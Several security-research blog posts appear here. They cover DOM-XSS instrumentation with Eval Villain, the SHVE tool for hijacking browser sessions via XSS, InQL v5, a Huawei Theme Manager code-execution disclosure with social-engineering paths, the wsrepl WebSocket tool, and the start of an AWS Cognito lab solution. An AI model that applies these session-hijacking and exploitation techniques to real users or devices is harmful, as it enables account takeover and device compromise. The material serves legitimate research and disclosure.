A quick word of warning. The above content script will give you first access to the only JavaScript thread. The website itself can’t run any JavaScript until you give up that thread. Try it out: see if you can make a website that runs document.write before the boilerplate has it hooked.
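A tiny test page for that race might look like this (if the hook wins, the call shows up in the console group logged by the proxy above):

<!-- race-test.html -->
<script>document.write("did the hook see this?");</script>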

First access is a huge advantage, you get to poison the environment that the website is about to use. Don’t give up your advantage until you are done poisoning. This means avoiding the use of async functions.

This is why many web extensions intended to inject user JavaScript into a page are buggy. Retrieving user configuration in a web extension is done using an async call. While the async call is looking up the user config, the page is running its code and has potentially already executed the sink you wanted to hook. This is why Eval Villain is only available on Firefox: Firefox has a unique API that can register the content script together with the user configuration.

Eval Villain

It is very rare that I run into a “Step 1” situation that can’t be solved with Eval Villain. Eval Villain is just a content script that hooks sinks and searches their input for sources. You can configure almost any native JavaScript functionality to be a sink. Sources include user-configured strings or regular expressions, URL parameters, local storage, cookies, the URL fragment and the window name. These sources are recursively decoded for important substrings. Let’s look at the same page from the example above, this time with Eval Villain in its default configuration.

Eval Villain example catching document.write DOM XSS

Notice this page is being loaded from a local file://. The source code is seen below.

<script>
let x = (new URLSearchParams(location.search)).get('x');
x = atob(x);
x = atob(x);
x = JSON.parse(x);
x = x['a'];
x = decodeURI(x);
x = atob(x);
document.write(`Welcome Back ${x}!!!`);
</script>

Even though the page makes no web requests, Eval Villain still successfully hooks the user-configured sink document.write before the page uses it. There is no race condition.

Also notice that Eval Villain is not just displaying the input of document.write. It correctly highlighted the injection point. The URL parameter x contained an encoded string that hit the sink document.write. Eval Villain figured this out by recursively decoding the URL parameters. Since the parameter was decoded, an encoder function is provided to the user. You can right-click, copy the message and paste it into the console. Using the encoder function lets you quickly try payloads. Below, the encoder function is used to inject a marquee tag into the page.

Eval Villain example catching document.write DOM XSS

If you read the previous sections, you know how this all works. Eval Villain is just using a content script to inject its JavaScript into a page. Anything it does, you can do in your own content script. Additionally, you can now use Eval Villain’s source code as your boilerplate and customize its features for your particular technical challenge.

Step 1.5: A Quick Tip

So let’s say you used “Step 1” to get a console.trace from an interesting native function. Maybe a URL parameter hit your decodeURI sink and now you’re tracing back to the URL parsing function. There is a mistake I regularly make in this situation and I want you to do better. When you get a trace, don’t start reading code yet!

Modern web applications often have polyfills and other cruft at the top of the console.trace. For example, the stack trace I get on the Google search results page starts with the functions iAa, ka, c, ng, getAll. Don’t get tunnel vision and start reading ka when getAll is obviously what you want. When you look at getAll, don’t read the source! Continue to scan: notice that getAll is a method and its siblings are get, set, size, keys, entries and all the other methods listed in the URLSearchParams documentation. We just found multiple custom URL parsers, re-implemented in minified code, without actually reading the code. “Scan” as much as you can; don’t start reading code deeply until you find the right spot or scanning has failed you.

Step 2: Hooking non-native code

Suppose instrumenting native code didn’t result in vulnerabilities, and now you want to instrument the non-native implementation itself. Let me illustrate this with an example.

Let’s say you discovered a URL parser function that returns an object named url_params. This object has all the key-value pairs for the URL parameters. We want to monitor access to that object. Doing so could give us a nice list of every URL parameter associated with a URL. We may discover new parameters this way and unlock hidden functionality in the site.

Doing this in JavaScript is not hard. In 16 lines of code we can have a well-organized, unique list of URL parameters associated with the appropriate page and saved for easy access in localStorage. We just need to figure out how to paste our code right into the URL parser.

function parseURL() {
    // URL parsing code
    // url_params = {"key": "value", "q": "bar" ...

    // The code you want to add in
    url_params = new Proxy(url_params, {
        __testit: function(a) {
            const loc = 'my_secret_space';
            const urls = JSON.parse(localStorage[loc]||"{}");
            const href = location.protocol + '//' + location.host + location.pathname;
            const s = new Set(urls[href]);
            if (!s.has(a)) {
                urls[href] = Array.from(s.add(a));
                localStorage.setItem(loc, JSON.stringify(urls));
            }
        },
        get: function(a,b,c) {
            this.__testit(b);
            return Reflect.get(...arguments);
        }
    });
    // End of your code

    return url_params;
}

Chrome’s dev tools will let you type your own code into the JavaScript source but I don’t recommend it. At least for me, the added code will disappear on page load. Additionally, it is not easy to manage any instrumentation points this way.

I have a better solution and it’s built into Firefox and Chrome. Take your instrumentation code, surround it with parentheses and add && false to the end. The above code becomes this:

(url_params = new Proxy(url_params, {
    __testit: function(a) {
        const loc = 'my_secret_space';
        const urls = JSON.parse(localStorage[loc]||"{}");
        const href = location.protocol + '//' + location.host + location.pathname;
        const s = new Set(urls[href]);
        if (!s.has(a)) {
            urls[href] = Array.from(s.add(a));
            localStorage.setItem(loc, JSON.stringify(urls));
        }
    },
    get: function(a,b,c) {
        this.__testit(b);
        return Reflect.get(...arguments);
    }
})) && false

Now right-click the line number where you want to add your code and click “conditional breakpoint”.

Creating a conditional breakpoint

Paste your code in there. Due to the && false, the condition will never be true, so you won’t ever get a breakpoint. The browser will still execute our code, in the scope of the function where we inserted the breakpoint. There are no race conditions and the breakpoint will continue to live: it will show up in new tabs when you open the developer tools. You can quickly disable individual instrumentation scripts by just disabling the associated breakpoint, or disable all of them by disabling breakpoints or closing the developer tools window.

I used this particular example to show just how far you can go. The instrumented code will save URL parameters, per site, to a local storage entry. At any given page, you can auto-populate all known URL parameters into the URL bar by pasting the following code into the console.

(() => {
const url = location.protocol + '//' + location.host + location.pathname;
const params = JSON.parse(localStorage.getItem("my_secret_space"))[url];
location.href = url + '?' + params.map( x => `${x}=${x}`).join('&');
})()

If you use this often, you can even put the code in a bookmarklet.
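For example, the same snippet minified onto one line and prefixed with javascript: works as a bookmarklet:

javascript:(()=>{const url=location.protocol+'//'+location.host+location.pathname;const params=JSON.parse(localStorage.getItem("my_secret_space"))[url];location.href=url+'?'+params.map(x=>`${x}=${x}`).join('&');})()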

Combining Native and Non-Native Instrumentation

Nothing says we can’t use native and non-native instrumentation at the same time. You can use a content script to inject big, fancy codebases, export that functionality to the global scope and then use it in a conditional breakpoint.

This brings us to the latest feature of Eval Villain. Your conditional can make use of Eval Villain’s recursive decoding feature. In the pop-up menu, click “configure” and go to the “globals” section. Ensure the “sourcer” line is enabled and click save.

The new sourcer feature enabled in Eval Villain

I find myself enabling/disabling this feature often, so there is a second “enable” flag in the popup menu itself. It’s in the “enable/disable” menu as “User Sources”. This causes Eval Villain to export the evSourcer function to the global scope. It will add any arbitrary object to the list of recursively decoded sources.

Console showing evSourcer's use

As can be seen, the first argument is what you name the source. The second is the actual object you want to search for in sinks; unless there is a custom encoding that Eval Villain does not understand, you can just pass it in raw. There is an optional third argument that will cause the sourcer to console.debug every time it’s invoked. This function returns false, so you can use it as a conditional breakpoint anywhere. For example, you can add it as a conditional breakpoint that only runs in a post message handler of interest, when receiving messages from a particular origin, as a means of finding out if any part of a message will hit a DOM XSS sink. Using this in the right place can alleviate SOP restrictions placed on your instrumentation code.
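As a hedged one-liner (the handler’s event variable and the origin are hypothetical), the breakpoint condition could be:

// Register cross-origin messages of interest as a recursively decoded source
event.origin === 'https://ads.example.com' && evSourcer('ad_pmsg', event.data, true)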

Just like the evSourcer, there is an evSinker. I rarely use it, so there is no “enable/disable” entry for it in the popup menu. It accepts a sink name and a list of arguments, and just acts like your own sink. It also returns false, so it can easily be used in conditional breakpoints.
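For instance, treating a custom templating routine as a sink could look like this as a breakpoint condition (function and variable names hypothetical):

// Check whether any known source reaches this custom render call
evSinker('renderTemplate', [tmpl, userData])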

Console showing evSinker's use

Conclusion

Writing your own instrumentation is a powerful skill for vulnerability research. Sometimes, it only takes a couple of lines of JavaScript to tame a giant, unruly codebase. By knowing how this works, you can have better insight into what tools like Eval Villain and DOM Invader can and can’t do. Whenever necessary, you can also adapt your own code when a tool comes up short.

Introducing Session Hijacking Visual Exploitation (SHVE): An Innovative Open-Source Tool for XSS Exploitation

SHVE-logo

Greetings, folks! Today, we’re thrilled to introduce you to our latest tool: Session Hijacking Visual Exploitation, or SHVE. This open-source tool, now available on our GitHub, offers a novel way to hijack a victim’s browser sessions, utilizing them as a visual proxy after hooking via an XSS or a malicious webpage. While some exploitation frameworks, such as BeEF, do provide hooking features, they don’t allow remote visual interactions.

SHVE’s interaction with a victim’s browser in the security context of the user relies on a comprehensive design incorporating multiple elements. These components, each fulfilling a specific function, form a complex, interconnected system that allows precise and controlled session hijacking. Let’s take a closer look at each of them:

  • VictimServer: This component serves the malicious JavaScript. Furthermore, it establishes a WebSocket connection to the hooked browsers, facilitating the transmission of commands from the server to the victim’s browser.

  • AttackerServer: This is the connection point for the attacker client. It supplies all the necessary information to the attacker, such as the details of the different hooked sessions.

  • Proxy: When the client enters Visual or Interactive mode, it connects to this proxy. The proxy, in turn, uses functionalities provided by the VictimServer to conduct all requests through the hooked browser.

SHVE-architecture

The tool comes with two distinctive modes - Visual and Interactive - for versatile usage.

  • Visual Mode: The tool provides a real-time view of the victim’s activities. This is particularly useful when exploiting an XSS, as it allows the attacker to witness the victim’s interactions that otherwise might be impossible to observe. For instance, if a victim accesses a real-time chat that isn’t stored for later review, the attacker could see this live interaction.

  • Interactive Mode: This mode provides a visual gateway to any specified web application. Since the operations are carried out using the victim’s security context via the hooked browser, detection from the server-side becomes significantly more challenging. Unlike typical XSS or CORS misconfigurations exploitation, there’s no need to steal information like Cookies or Local Storage. Instead, the tool uses XHR requests, ensuring CSRF tokens are automatically sent, as both victim and attacker view the same HTML.

Getting Started

We’ve tried to make the installation process as straightforward as possible. You’ll need to have Node.js and npm installed on your system. After cloning our repository, navigate to the server and client directories to install their respective dependencies. Start the server and client, follow the initial setup steps, and you’re ready to go! For the full installation guide, please refer to the README file.

We’ve recorded a video showcasing these modes and demonstrating how to exploit XSS and CORS misconfigurations using one of PortSwigger’s Web Security Academy labs. Here is how SHVE works:

We look forward to your contributions and insights, and can’t wait to see how you’ll use SHVE in your red team engagements. Happy hacking!

Thanks to Michele Orru and Giuseppe Trotta for their early-stage feedback and ideas.

InQL v5: A Technical Deep Dive

We’re thrilled to pull back the curtain on the latest iteration of our widely-used Burp Suite extension - InQL. Version 5 introduces significant enhancements and upgrades, solidifying its place as an indispensable tool for penetration testers and bug bounty hunters.

InQL v5.0

Introduction

The cybersecurity landscape is in a state of constant flux. As GraphQL adoption surges, the demand for an adaptable, resilient testing tool has become paramount. As leaders in GraphQL security, Doyensec is proud to reveal the most recent iteration of our open-source testing tool - InQL v5.x. This isn’t merely an update; it’s a comprehensive revamp designed to augment your GraphQL testing abilities.

The Journey So Far: From Jython to Kotlin

Our journey with InQL started on the Jython platform. However, as time went by, we began to experience the limitations of Jython - chiefly, its lack of support for Python 3, which made it increasingly difficult to find compatible tooling and libraries. It was clear a transition was needed. After careful consideration, we chose Kotlin. Not only is it compatible with Java (which Burp is written in), but it also offers robustness, flexibility, and a thriving developer community.

The Challenges of Converting a Burp Extension Into Kotlin

We opted to include the entire Jython runtime (over 40 MB) within the Kotlin extension to overcome the challenges of reusing the existing Jython code. Although it wasn’t the ideal solution, this approach allowed us to launch the extension as Kotlin, initiate the Jython interpreter, and delegate execution to the older Jython code.

class BurpExtender: IBurpExtender, IExtensionStateListener, BurpExtension {

    private var legacyApi: IBurpExtenderCallbacks? = null
    private var montoya: MontoyaApi? = null

    private var jython: PythonInterpreter? = null
    private var pythonPlugin: PyObject? = null

    // Legacy API gets instantiated first
    override fun registerExtenderCallbacks(callbacks: IBurpExtenderCallbacks) {

        // Save legacy API for the functionality that still relies on it
        legacyApi = callbacks

        // Start embedded Python interpreter session (Jython)
        jython = PythonInterpreter()
    }

    // Montoya API gets instantiated second
    override fun initialize(montoyaApi: MontoyaApi) {
        // The new Montoya API should be used for all of the new functionality in InQL
        montoya = montoyaApi

        // Set the name of the extension
        montoya!!.extension().setName("InQL")

        // Instantiate the legacy Python plugin
        pythonPlugin = legacyPythonPlugin()

        // Pass execution to legacy Python code
        pythonPlugin!!.invoke("registerExtenderCallbacks")
    }

    private fun legacyPythonPlugin(): PyObject {
        // Make sure UTF-8 is used by default
        jython!!.exec("import sys; reload(sys); sys.setdefaultencoding('UTF8')")

        // Pass callbacks received from Burp to Python plugin as a global variable
        jython!!.set("callbacks", legacyApi)
        jython!!.set("montoya", montoya)

        // Instantiate legacy Python plugin
        jython!!.exec("from inql.extender import BurpExtenderPython")
        val legacyPlugin: PyObject = jython!!.eval("BurpExtenderPython(callbacks, montoya)")

        // Delete global after it has been consumed
        jython!!.exec("del callbacks, montoya")

        return legacyPlugin
    }
}

Sidestepping the need for stickytape

Our switch to Kotlin also solved another problem. Jython extensions in Burp Suite are typically a single .py file, but the complexity of InQL necessitates a multi-file layout. Previously, we used the stickytape library to bundle the Python code into a single file. However, stickytape introduced subtle bugs and inhibited access to static files. By making InQL a Kotlin extension, we can now bundle all files into a JAR and access them correctly.

Introducing GQLSpection: The Core of InQL v5.x

A significant milestone in our transition journey involved refactoring the core portion of InQL that handles GraphQL schema parsing. The result is GQLSpection - a standalone library compatible with Python 2/3 and Jython, featuring a convenient CLI interface. We’ve included all GraphQL code examples from the GraphQL specification in our test cases, ensuring comprehensive coverage.

As an added advantage, it also replaces the standalone and CLI modes of the previous InQL version, which were removed to streamline our code base.

GQLSpection

New Features

Our clients rely heavily on cutting-edge technologies. As such, we frequently have the opportunity to engage with real-world GraphQL deployments in many of our projects. This rich exposure has allowed us to understand the challenges InQL users face and the requirements they have, enabling us to decide which features to implement. In response to these insights, we’ve introduced several significant features in InQL v5.0 to support more effective and efficient audits and investigations.

Points of Interest

One standout feature in this version is “Points of Interest”. Powered by GQLSpection and with the initial implementation contributed by @schoobydrew, this is essentially a keyword scan equipped with several customizable presets.

Points of Interest settings

The Points of Interest scan proves exceptionally useful when analyzing extensive schemas with over 50 queries/mutations and thousands of fields. It produces reports in both human-readable text and JSON format, providing a high-level overview of the vast schemas often found in modern apps, and aiding pentesters in swiftly identifying sensitive data or dangerous functionality within the schema.

Points of Interest results

Improved Logging

One of my frustrations with earlier versions of the tool was the lack of useful error messages when the parser broke on real-world schemas. So, I introduced configurable logging. This, coupled with the fact that parsing functionality is now handled by GQLSpection, has made InQL v5.0 much more reliable and user-friendly.

In-line Annotations

Another important addition to InQL is annotations. Prior to this, InQL only generated the bare minimum query, necessitating the use of other tools to deduce the correct input format, expected values, etc. However, with the addition of inline comments populated with content from “description” fields in the GraphQL schema, or from type annotations, InQL v5.0 has become much more of a standalone tool.

Annotations

There is a trade-off here: while the extensive annotations make InQL more usable, they can sometimes make it hard to comprehend and navigate. We’re looking at solutions for future releases to dynamically limit the display of annotations.

The Future of InQL and GraphQL Security

Our roadmap for InQL is ambitious. To start, we are committed to reintroducing features like GraphiQL and Circular Relationship Detection, achieving full feature parity with v4.

As GraphQL continues to grow, ensuring robust security is crucial. InQL’s future involves addressing niche GraphQL features that are often overlooked and improving upon existing pentesting tools. We look forward to sharing more developments with the community.

InQL: A Great Project for Students and Contributors

InQL is not just a tool, it’s a project – a project that invites the contributions of those who are passionate about cybersecurity. We’re actively seeking students and developers who would like to contribute to InQL or do GraphQL-adjacent security research. This is an opportunity to work with experts in GraphQL security, and play a part in shaping the future of InQL.

DoyensecInQL

Conclusion

InQL v5.x is the result of relentless work and an unwavering commitment to enhancing GraphQL security. We urge all pentesters, bug hunters, and cybersecurity enthusiasts working with GraphQL to try out this new release. If you’ve tried InQL in the past and are looking forward to enhancements, v5.0 will not disappoint.

At Doyensec, we’re not just developing a tool, we’re pushing the boundaries of what’s possible in GraphQL security. We invite you to join us on this journey, whether as a user, contributor, or intern.

Happy Hacking!

Huawei Theme Manager Arbitrary Code Execution

Back in 2019, we were lucky enough to take part in the newly-launched Huawei mobile bug bounty. For that, we decided to research Huawei’s Themes.

The Theme Manager allows custom themes on EMUI devices, enabling users to stylize preferences and customize lock screens, wallpapers and icons. Processes capable of making these types of system-wide changes need to have elevated privileges, making them valuable targets for research as well as exploitation.

Background

When it comes to implementing a lockscreen on EMUI, there are three possible engines:

  • com.ibimuyu.lockscreen
  • com.vlife.huawei.emuilock
  • com.huawei.ucdlockscreen

When installing a theme, the SystemUI.apk verifies the signature of the application attempting to make these changes against a hardcoded list of trusted ones. From what we observed, this process seems to have been implemented properly, with no clear way to bypass the signature checks.

That said, we discovered that when com.huawei.ucdlockscreen was used, it loaded additional classes at runtime. The signatures of these classes were never checked, let alone validated properly. This presented an opportunity for us to introduce our own code.

Taking a look at the structure of the theme archive files (.hwt), we see that the unlock screen elements are packaged as follows:

Archive Structure

Looking in the unlock directory, we saw the theme.xml file, which is a manifest specifying several properties. These settings include the dynamic unlock engine to use (ucdscreenlock in our case) and an ext.properties file, which allows for dynamic Java code loading from within the theme file.

Let’s look at the file content:

Archive Structure
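The original screenshot is not reproduced here, but a hypothetical reconstruction of the ext.properties content is sketched below. The key names are illustrative inventions on our part; only the referenced class and APK names come from our analysis.

# Hypothetical ext.properties content (key names are illustrative)
ext.jar=NOVA6LockScreen2019120501.apk
ext.class=com.huawei.nova.ExtensionJarImpl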

This instructs the dynamic engine (com.huawei.ucdlockscreen) to load com.huawei.nova.ExtensionJarImpl at runtime from the NOVA6LockScreen2019120501.apk. Since this class is not validated, we can introduce our own code to achieve arbitrary code execution. What makes this even more interesting is that our code will run within a process of a highly privileged application (com.huawei.android.thememanager), as shown below.

Privileged Application List

Utilizing the logcat utility, we can see the dynamic loading process:

Process Logs

This vulnerability was confirmed via direct testing on EMUI 9.1 and 10, but appears to impact the current version of EMUI with some limitations, as discussed below.

Theme in foreground with logcat in back

Impact

As previously mentioned, this results in arbitrary code execution within the process of a highly privileged application. In our testing, exploitation resulted in obtaining around 200 Android and Huawei custom permissions. Among those were the permissions listed below, which could result in total compromise of the device's user data, sensitive system data, any credentials entered into the system and the integrity of the system's environment.

Permissions List

Considering that the application can send intents requiring the huawei.android.permission.HW_SIGNATURE_OR_SYSTEM permission, we believe it is possible to leverage existing system functionalities to obtain system level code execution. Once achieved, this vulnerability has great potential as part of a rooting chain.

Exploitability

This issue can be reliably exploited with no technical impediments. That said, exploitation requires installing a custom theme, so remote exploitation requires user interaction. We can conceive of several plausible social engineering scenarios that could be effective, or a second vulnerability could be used to force the download and installation of themes. Firstly, it is possible to gift themes to other users, so a compromised trusted contact could be leveraged (or spoofed) to convince a victim to accept and install the malicious theme. As an example, the following URL will open the theme gift page: hwt://www.huawei.com/themes?type=33&id=0&from=AAAA&channelId=BBB

Theme gifting attack flow

Secondly, an attacker could publish a link or QR code pointing to the malicious theme online, then trick a victim into triggering the HwThemeManager application via a deep link using the hwt:// scheme.

To be fair, we must acknowledge that Huawei has a review process in place for new themes and wallpapers, which might limit the use of live themes exploiting this vulnerability.

Partial fix

Huawei released an update for HwThemeManager on February 24, 2022 (internally tracked as HWPSIRT-2019-12158), stating this was resolved. However, we believe the issue was actually resolved in ucdlockscreen.apk (com.huawei.ucdlockscreen version 3 and later).

This is an important distinction, because the latest version of ucdlockscreen.apk is installed at runtime by HwThemeManager, after applying a theme that requires such an engine. Even on a stock phone (EMUI 9, 10, and the latest 12.0.0.149), an attacker with physical access can uninstall the latest version and install the old vulnerable version, since it is properly signed by Huawei.

Without further mitigations from Huawei, an attacker with physical access to the device can still leverage this vulnerability to gain system privileged access on even the latest devices.

Further discovery

After a few hours of reverse engineering the fix introduced in the latest version of com.huawei.ucdlockscreen (version 4.6), we discovered an additional bypass impacting the EMUI 9.1 release. This issue doesn’t require physical access and can again trigger the same exploitable condition.

During theme loading, the latest version of com.huawei.ucdlockscreen checks for the presence of a /data/themes/0/unlock/ucdscreenlock/error file. Since all of the files within /data/themes/0/ are copied from the provided theme (.hwt) file they can all be attacker-controlled.

This file is used to check the specific version of the theme. An attacker can simply embed an error file referencing an older version, forcing legacy theme support. When doing so, an attacker would also specify a fictitious package name in the ext.properties file. This combination of changes in the malicious .hwt file bypasses all the required checks - making the issue exploitable again on the latest EMUI 9.1, with no physical access required. At the time of our investigation, the other EMUI major versions appeared to implement signature validation mechanisms that mitigate this.

Disclosure

This issue was disclosed on Dec 31, 2019 according to the terms of the Huawei Mobile Bug Bounty, and it was addressed by Huawei as described above. Additional research results were reported to Huawei on Sep 1, 2021. Given the time that has elapsed from the original fix and the fact that we believe the issue is no longer remotely exploitable, we have decided to release the details of the vulnerability.

At the time of writing this post (April 28th, 2023), the issue is still exploitable locally on the latest EMUI (12.0.0.149) by force-loading the vulnerable ucdlockscreen.apk. We have decided not to release the vulnerable version of ucdlockscreen.apk or the malicious theme proof-of-concept. While the issue is no longer interesting to remote attackers, the details can still benefit the rooting community and facilitate the work of security researchers in identifying issues within Huawei's EMUI-based devices.

Conclusions

While the vulnerability is technically interesting by itself, there are two security engineering lessons here. The biggest takeaway is clearly that while relying on signature validation for authenticating software components can be an effective security measure, it must be thoroughly extended to include any dynamically loaded code. That said, it appears Huawei no longer provides bootloader unlock options (see here), making rooting more complicated and expensive. It remains to be seen if this bug is ever used as part of a chain developed by the rooting community.

A secondary engineering lesson is that when designing backwards compatibility mechanisms, we should assume there will be older versions that we eventually want to abandon.

This research was made possible by the Huawei Mobile Phone Bug Bounty Program. We want to thank the Huawei PSIRT for their help in handling this issue, the generous bounty and the openness to disclose the details.

Streamlining Websocket Pentesting with wsrepl

In an era defined by instant gratification, where life zips by quicker than a teenager’s TikTok scroll, WebSockets have evolved into the heartbeat of web applications. They’re the unsung heroes in data streaming and bilateral communication, serving up everything in real-time, because apparently, waiting is so last century.

However, when tasked with pentesting these WebSockets, it feels like you’re juggling flaming torches on a unicycle, atop a tightrope! Existing tools, while proficient in their specific realms, are much like mismatched puzzle pieces – they don’t quite fit together, leaving you to bridge the gaps. Consequently, you find yourself shifting from one tool to another, trying to manage them simultaneously and wishing for a more streamlined approach.

That's where https://github.com/doyensec/wsrepl comes to the rescue. This tool, the latest addition to Doyensec's security tools, is designed to simplify the auditing of WebSocket-based apps. wsrepl strikes a much-needed balance by offering an interactive REPL interface that's user-friendly, while also being conveniently easy to automate. With wsrepl, we aim to turn the tide in WebSocket pentesting, providing a tool that is as efficient as it is intuitive.

The Doyensec Challenge

Once upon a time, we took up an engagement with a client whose web application relied heavily on WebSockets for soft real-time communication. This wasn't an easy feat. The client had a robust bug bounty policy and had undergone multiple pentests before. Hence, we were fully aware that the lowest-hanging fruit had probably already been plucked. Nevertheless, as true Doyensec warriors ('doyen' - a term Merriam-Webster describes as 'a person considered to be knowledgeable or uniquely skilled as a result of long experience in some field of endeavor'), we were prepared to dig deeper for potential vulnerabilities.

Our primary obstacle was the application’s custom protocol for data streaming. Conventional wisdom among pentesters suggests that the most challenging targets are often the ones most overlooked. Intriguing, isn’t it?

The Quest for the Perfect Tool

The immediate go-to tool for pentesting WebSockets would typically be Burp Suite. While it’s a heavyweight in web pentesting, we found its implementation of WebSockets mirrored HTTP requests a little bit too closely, which didn’t sit well with near-realtime communications.

Sure, it does provide a neat way to get an interactive WS session, but it's a bit tedious - navigating through 'Upgrade: websocket', hopping between 'Repeater', 'Websocket', 'New WebSocket', filling in details, and altering HTTP/2 to HTTP/1.1. The result is a decent REPL, but the process? Not so much.

Initiating a new websocket in Burp

Don't get me wrong, Burp does have its advantages. Pentesters already have it open most of the time, it highlights JSON or XML, and it integrates well with existing extensions. Despite that, it falls short when you have to automate custom authentication schemes, protocols, connection tracking, or data serialization schemes.

Other tools, like websocketking.com and hoppscotch.io/realtime/websocket, offer easy-to-use and aesthetically pleasing graphical clients within the browser. However, they lack comprehensive options for automation. Tools like websocket-harness and WSSiP bridge the gap between HTTP and WebSockets, which can be useful, but again, they don’t offer an interactive REPL for manual inspection of traffic.

Finally, we landed on websocat, a netcat-inspired command line WebSocket client that comes closest to what we had in mind. While it does offer a host of features, it's predominantly geared towards debugging WebSocket servers, not pentesting.

wsrepl: The WebSockets Pentesting Hero

Enter wsrepl, born out of necessity as our answer to the challenges we faced. It is not just another pentesting tool, but an agile solution that sits comfortably in the middle - offering an interactive REPL experience while also providing a simple and convenient path to automation.

Built with Python's fantastic TUI framework Textual, it enables an accessible experience that is easy to navigate with both mouse and keyboard. That's just scratching the surface though. Its interoperability with curl's arguments enables a fluid transition from the Upgrade request in Burp to wsrepl. All it takes is to copy a request through the 'Copy as curl command' menu option and replace curl with wsrepl, as shown below.
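For example, assuming a placeholder URL and headers, a command copied from Burp and its wsrepl equivalent would look like this:

$ curl 'https://example.com/api/ws' -H 'Upgrade: websocket' -H 'Connection: Upgrade'
$ wsrepl 'https://example.com/api/ws' -H 'Upgrade: websocket' -H 'Connection: Upgrade'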

Initiating a new WebSocket in wsrepl

On the surface, wsrepl is just like any other tool, showing incoming and outgoing traffic with the added option of sending new messages. The real magic however, is in the details. It leaves nothing to guesswork. Every hexadecimal opcode is shown as per RFC 6455, a feature that could potentially save you from many unnecessary debugging hours.

A lesson learned

Here’s an anecdote to illustrate this point. At the beginning of our engagement with WebSockets, I wasn’t thoroughly familiar with the WebSocket RFC and built my understanding based on what Burp showed me. However, Burp was only displaying text messages, obscuring message opcodes and autonomously handling pings without revealing them in the UI. This partial visibility led to some misconceptions about how WebSockets operate. The developers of the service we were testing seemingly had the same misunderstanding, as they implemented ping traffic using 0x1 - text type messages. This caused confusion and wasted time when my scripts kept losing the connection, even though the traffic appeared to align with my Burp observations.

To avoid similar pitfalls, wsrepl is designed to give you the whole picture, without any hidden corners. Here's a quick rundown of the WebSocket opcodes defined in RFC 6455 that you can expect to see in wsrepl:

Opcode Description
0x0 Continuation Frame
0x1 Text Frame
0x2 Binary Frame
0x8 Connection Close
0x9 Ping
0xA Pong (must carry the same payload as the corresponding Ping frame)

Contrary to most WebSocket protocols that mainly use 0x1 type messages, wsrepl accompanies all messages with their opcodes, ensuring full transparency. We’ve intentionally made the decision not to conceal ping traffic by default, although you have the choice to hide them using the --hide-ping-pong option.

Additionally, wsrepl introduces the unique capability of sending 'fake' ping messages that use the 0x1 message frame. Payloads can be defined with the options --ping-0x1-payload and --pong-0x1-payload, and the interval controlled with --ping-0x1-interval. It also supports client-initiated ping messages (protocol level, 0x9), even though these are typically sent by the server: --ping-interval.
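To make the distinction concrete, here is a minimal Python sketch of the two kinds of ping, using the third-party websockets library and a placeholder URL (both assumptions on our part, not part of wsrepl):

import asyncio
import websockets  # pip install websockets

async def main():
    async with websockets.connect("wss://example.com/ws") as ws:
        await ws.ping()        # protocol-level ping, opcode 0x9
        await ws.send("ping")  # application-level 'fake' ping: a 0x1 text frame

asyncio.run(main())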

It's also noteworthy that wsrepl incorporates an automatic reconnection feature in case of disconnects. Coupled with granular ping control, these features empower you to initiate long-lasting and stable WebSocket connections, which have proven useful for executing certain attacks.

Automation Made Simple with wsrepl

Moreover, wsrepl is crafted with a primary goal in mind: enabling you to quickly transition into WebSocket automation. To do this, you just need to write a Python plugin, which is pretty straightforward and, unlike Burp, feels quintessentially pythonic.

from wsrepl import Plugin

MESSAGES = [
    "hello",
    "world"
]

class Demo(Plugin):
    """Demo plugin that sends a static list of messages to the server."""
    def init(self):
        self.messages = MESSAGES

It's Python, so really, the sky's the limit. For instance, here is how to send an HTTP request to acquire the auth token, and then use it to authenticate with the WebSocket server:

from wsrepl import Plugin
from wsrepl.WSMessage import WSMessage

import json
import requests

class Demo(Plugin):
    """Demo plugin that dynamically acquires authentication token."""
    def init(self):
        # Here we simulate an API request to get a session token by supplying a username and password.
        # For the demo, we're using a dummy endpoint "https://hb.cran.dev/uuid" that returns a UUID.
        # In a real-life scenario, replace this with your own authentication endpoint and provide necessary credentials.
        token = requests.get("https://hb.cran.dev/uuid").json()["uuid"]

        # The acquired session token is then used to populate self.messages with an authentication message.
        # The exact format of this message will depend on your WebSocket server requirements.
        self.messages = [
            json.dumps({
                "auth": "session",
                "sessionId": token
            })
        ]

The plugin system is designed to be as flexible as possible. You can define hooks that are executed at various stages of the WebSocket lifecycle. For instance, you can use on_message_sent to modify messages before they are sent to the server, or on_message_received to parse and extract meaningful data from the server’s responses. The full list of hooks is as follows:

Order of wsrepl hook execution

Customizing the REPL UI

The true triumph of wsrepl lies in its capacity to automate even the most complicated protocols. It is easy to add custom serialization routines, allowing you to focus on the stuff that matters.

Say you’re dealing with a protocol that uses JSON for data serialization, and you’re only interested in a single field within that data structure. wsrepl allows you to hide all the boilerplate, yet preserve the option to retrieve the raw data when necessary.

from wsrepl import Plugin

import json
from wsrepl.WSMessage import WSMessage

class Demo(Plugin):
    async def on_message_sent(self, message: WSMessage) -> None:
        # Grab the original message entered by the user
        original = message.msg

        # Prepare a more complex message structure that our server requires.
        message.msg = json.dumps({
            "type": "message",
            "data": {
                "text": original
            }
        })

        # Short and long versions of the message are used for display purposes in REPL UI.
        # By default they are the same as 'message.msg', but here we modify them for better UX.
        message.short = original
        message.long = message.msg


    async def on_message_received(self, message: WSMessage) -> None:
        # Get the original message received from the server
        original = message.msg

        try:
            # Try to parse the received message and extract meaningful data.
            # The exact structure here will depend on your websocket server's responses.
            message.short = json.loads(original)["data"]["text"]
        except (json.JSONDecodeError, KeyError, TypeError):
            # In case of a parsing error, let's inform the user about it in the history view.
            message.short = "Error: could not parse message"

        # Show the original message when the user focuses on it in the UI.
        message.long = original

In conclusion, wsrepl is designed to make your WebSocket pentesting life easier. It’s the perfect blend of an interactive REPL experience with the ease of automation. It may not be the magical solution to every challenge you’ll face in pentesting WebSockets, but it is a powerful tool in your arsenal. Give it a try and let us know your experiences!

Messing Around With AWS Batch For Privilege Escalations

CloudsecTidbit

From The Previous Episode… Have you solved the CloudSecTidbit Ep. 2 IaC lab?

Solution

The challenge for the AWS Cognito CloudSecTidbit is basically escalating the privileges to admin and reading the internal users list.

The application uses AWS Cognito to issue a session token saved as a cookie with the name aws-cognito-app-access-token.

The JWT is a valid AWS Cognito user token, usable to interact with the service. It is possible to retrieve the current user attributes with the command:

aws cognito-idp get-user --region us-east-1 --access-token <USER_ACCESS_TOKEN>
{
    "Username": "francesco",
    "UserAttributes": [
        {
            "Name": "sub",
            "Value": "5139e6e7-7a37-4e6e-9304-8c32973e4ac0"
        },
        {
            "Name": "email_verified",
            "Value": "true"
        },
        {
            "Name": "name",
            "Value": "francesco"
        },
        {
            "Name": "custom:Role",
